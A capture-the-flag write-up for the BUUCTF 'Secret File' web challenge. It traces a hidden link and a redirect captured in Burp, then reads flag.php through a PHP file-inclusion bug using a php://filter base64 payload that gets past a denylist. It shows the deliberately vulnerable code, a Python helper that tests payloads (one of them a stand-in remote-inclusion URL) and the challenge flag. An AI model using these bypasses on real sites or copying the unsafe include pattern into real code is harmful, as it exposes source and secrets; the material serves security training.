BUUCTF WEB [极客大挑战 2019]Secret File
- After launching the challenge, the landing page shows only a red-on-black teaser (screenshot not reproduced here).
Press F12 to view the page source:
<!DOCTYPE html>
<html>
<style type="text/css" >
#master { position:absolute; left:44%; bottom:0; text-align :center; }
p,h1 { cursor: default; }
</style>
<head>
<meta charset="utf-8">
<title>蒋璐源的秘密</title>
</head>
<body style="background-color:black;"><br><br><br><br><br><br>
<h1 style="font-family:verdana;color:red;text-align:center;">你想知道蒋璐源的秘密么?</h1><br><br><br>
<p style="font-family:arial;color:red;font-size:20px;text-align:center;">想要的话可以给你,去找吧!把一切都放在那里了!</p>
<a id="master" href="./Archive_room.php" style="background-color:#000000;height:70px;width:200px;color:black;left:44%;cursor:default;">Oh! You found me</a>
<div style="position: absolute;bottom: 0;width: 99%;"><p align="center" style="font:italic 15px Georgia,serif;color:white;"> Syclover @ cl4y</p></div>
</body>
</html>
The interesting part is an anchor (styled black-on-black, so invisible on the rendered page) that points to another page:
<a id="master" href="./Archive_room.php" style="background-color:#000000;height:70px;width:200px;color:black;left:44%;cursor:default;">Oh! You found me</a>
Try visiting Archive_room.php.
- Clicking the SECRET button on that page automatically redirects to end.php, which just says that the secret has already been seen. That suggests something happens in between.
Capturing the traffic with Burp Suite shows that the button first requests action.php, which then redirects to end.php. The browser never renders the body of that redirect, so send the request again from Repeater:
GET /action.php HTTP/1.1
Host: b1dd1aed-6389-452a-8c8e-8f0363d3f057.node4.buuoj.cn:81
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://b1dd1aed-6389-452a-8c8e-8f0363d3f057.node4.buuoj.cn:81/Archive_room.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
The response is a 302 whose body carries an HTML comment naming the next page:
HTTP/1.1 302 Found
Server: openresty
Date: Sat, 09 Apr 2022 02:40:03 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Location: end.php
X-Powered-By: PHP/7.3.11
Content-Length: 63

<!DOCTYPE html>
<html>
<!-- secr3t.php -->
</html>
Visit secr3t.php. It prints its own source with highlight_file():
<html>
<title>secret</title>
<meta charset="UTF-8">
<?php
highlight_file(__FILE__);
error_reporting(0);
$file=$_GET['file'];
if(strstr($file,"../")||stristr($file, "tp")||stristr($file,"input")||stristr($file,"data")){
echo "Oh no!";
exit();
}
include($file);
//flag放在了flag.php里
?>
</html>
This is a file inclusion vulnerability: the file parameter is passed straight to include(), guarded only by a short denylist. The comment says the flag is in flag.php.
About the filter:
<?php
highlight_file(__FILE__);
error_reporting(0);
$file=$_GET['file'];
if(strstr($file,"../")||stristr($file, "tp")||stristr($file,"input")||stristr($file,"data")){
echo "Oh no!";
exit();
}
include($file);
//flag放在了flag.php里
?>
strstr
strstr(string $haystack, mixed $needle, bool $before_needle = false): string finds the first occurrence of a string and returns the part of haystack from the first occurrence of needle to the end of haystack. It is case-sensitive.
stristr
stristr(string $haystack, mixed $needle, bool $before_needle = false): string does the same as strstr but is case-insensitive.
So the code rejects any $file value containing ../ (case-sensitive, via strstr) or tp, input or data (case-insensitive, via stristr). ../ blocks directory traversal; tp blocks the http://, https:// and ftp:// wrappers, i.e. remote file inclusion; input and data block the php://input and data:// wrappers, the usual way to turn a file inclusion into code execution. None of these patterns matches php://filter, so the filter wrapper can still be used to read flag.php through the include.
Including flag.php directly would not help: PHP would execute it and only the echo would be shown, while the flag sits in a variable that is never printed. Wrapping the read in convert.base64-encode makes include() receive base64 text instead of PHP code, so the whole source is emitted into the page.
Payload:
/secr3t.php?file=php://filter/read=convert.base64-encode/resource=flag.php
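The Burp step and the filter bypass above, written out as an added Python helper. This is not code from the writeup or from the challenge: it reimplements the secr3t.php denylist so candidate payloads can be checked offline before sending them, builds the php://filter chain, pulls hidden comments out of a raw 302 response, and decodes the base64 that include() echoes back. The function names are my own, and the sample response and leak page are constructed from the captures shown above (the exact bytes of the original capture are not on the page).

```python
import base64
import re
from typing import List, Optional

# Added example, not code from the writeup or the challenge. It mirrors the
# denylist in secr3t.php so candidate payloads can be checked offline, builds
# the php://filter chain, and decodes what include() echoes back.

BLOCKED_CASE_SENSITIVE = ("../",)                   # checked with strstr()
BLOCKED_CASE_INSENSITIVE = ("tp", "input", "data")  # checked with stristr()


def passes_filter(file_param: str) -> bool:
    """Return True if secr3t.php would reach include($file) for this value."""
    if any(needle in file_param for needle in BLOCKED_CASE_SENSITIVE):
        return False
    lowered = file_param.lower()  # stristr() ignores case: "PHP://INPUT" is blocked too
    return not any(needle in lowered for needle in BLOCKED_CASE_INSENSITIVE)


def filter_payload(resource: str, encoding: str = "convert.base64-encode") -> str:
    """php://filter read chain that makes include() emit the encoded source
    of `resource` instead of executing it."""
    return f"php://filter/read={encoding}/resource={resource}"


def hidden_comments(raw_http_response: str) -> List[str]:
    """HTML comments in a response body. A browser following the 302 from
    action.php never shows its body, which is where secr3t.php was leaked."""
    _head, _sep, body = raw_http_response.partition("\r\n\r\n")
    return re.findall(r"<!--\s*(.*?)\s*-->", body, re.S)


def decode_leaked_source(page: str) -> str:
    """Pick the base64 blob out of the secr3t.php output and decode it.
    The blob is the longest run of base64 characters on the page."""
    blob = max(re.findall(r"[A-Za-z0-9+/]+=*", page), key=len)
    return base64.b64decode(blob).decode("utf-8")


def extract_flag(source: str) -> Optional[str]:
    match = re.search(r"flag\{[^}]*\}", source)
    return match.group(0) if match else None


# Constructed sample: the action.php response captured in Burp, rebuilt with
# CRLF line endings (the original capture's exact bytes are not on the page).
SAMPLE_302 = (
    "HTTP/1.1 302 Found\r\n"
    "Server: openresty\r\n"
    "Content-Type: text/html; charset=UTF-8\r\n"
    "Location: end.php\r\n"
    "\r\n"
    "<!DOCTYPE html>\n<html>\n<!-- secr3t.php -->\n</html>\n"
)

# The PHP part of flag.php as decoded in the writeup, used to build a
# constructed sample of the page secr3t.php returns for the filter payload.
FLAG_PHP_SOURCE = (
    "<?php\n"
    'echo "我就在这里";\n'
    "$flag = 'flag{3be9e2b1-0e53-48e4-987b-0aacef0c9547}';\n"
    "$secret = 'jiAng_Luyuan_w4nts_a_g1rIfri3nd'\n"
    "?>\n"
)
SAMPLE_LEAK_PAGE = (
    '<html> <title>secret</title> <meta charset="UTF-8"> '
    '<code><span style="color: #000000">highlight_file(__FILE__);</span></code>'
    + base64.b64encode(FLAG_PHP_SOURCE.encode("utf-8")).decode("ascii")
    + "</html>"
)

if __name__ == "__main__":
    for candidate in ("../flag.php", "php://input", "PHP://INPUT",
                      "data://text/plain,x", "http://evil.example/x",
                      filter_payload("flag.php")):
        verdict = "passes" if passes_filter(candidate) else "Oh no!"
        print(f"{candidate!r:70} -> {verdict}")
    print("hidden in 302 body:", hidden_comments(SAMPLE_302))
    print(extract_flag(decode_leaked_source(SAMPLE_LEAK_PAGE)))
```

If convert.base64-encode were also on the denylist, the same chain works with any other stream filter the check does not match, for example string.rot13; only the decode step changes.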
The page comes back with the base64-encoded contents of flag.php appended after the highlighted source (the encoded blob itself is not reproduced here).
Decoding it gives the flag:
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>FLAG</title>
</head>
<body style="background-color:black;"><br><br><br><br><br><br>
<h1 style="font-family:verdana;color:red;text-align:center;">啊哈!你找到我了!可是你看不到我QAQ~~~</h1><br><br><br>
<p style="font-family:arial;color:red;font-size:20px;text-align:center;">
<?php
echo "我就在这里";
$flag = 'flag{3be9e2b1-0e53-48e4-987b-0aacef0c9547}';
$secret = 'jiAng_Luyuan_w4nts_a_g1rIfri3nd'
?>
</p>
</body>
</html>